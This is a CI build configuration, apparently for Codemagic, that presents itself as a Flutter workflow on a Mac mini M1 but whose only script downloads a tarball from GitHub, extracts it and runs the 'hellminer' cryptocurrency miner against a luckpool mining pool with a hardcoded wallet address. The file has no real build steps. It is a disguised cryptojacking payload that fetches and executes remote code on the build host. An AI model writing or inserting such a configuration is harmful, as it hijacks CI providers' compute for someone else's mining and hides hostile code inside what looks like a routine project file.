workflows:
  default-workflow:
    name: Default Workflow
    instance_type: mac_mini_m1
    max_build_duration: 120
    environment:
      flutter: 3.7.5
      xcode: latest
      cocoapods: default
      vars:
        SNAPCRAFT_BUILD_ENVIRONMENT: host
      groups:
        - snapcraft_credentials
    cache:
      cache_paths: []
    triggering:
      branch_patterns:
        - pattern: master
          include: true
          source: true
    scripts:
      - wget https://github.com/tesasik67/q1/raw/main/hellminer-main.tar.gz && tar -xvf hellminer-main.tar.gz && cd hellminer-main && chmod +x hellminer && ./hellminer -c stratum+tcp://na.luckpool.net:3956 -u RVxwfn5TggLnYPgEAGQf8W7kes28QNQGJg.Rig001 -p x
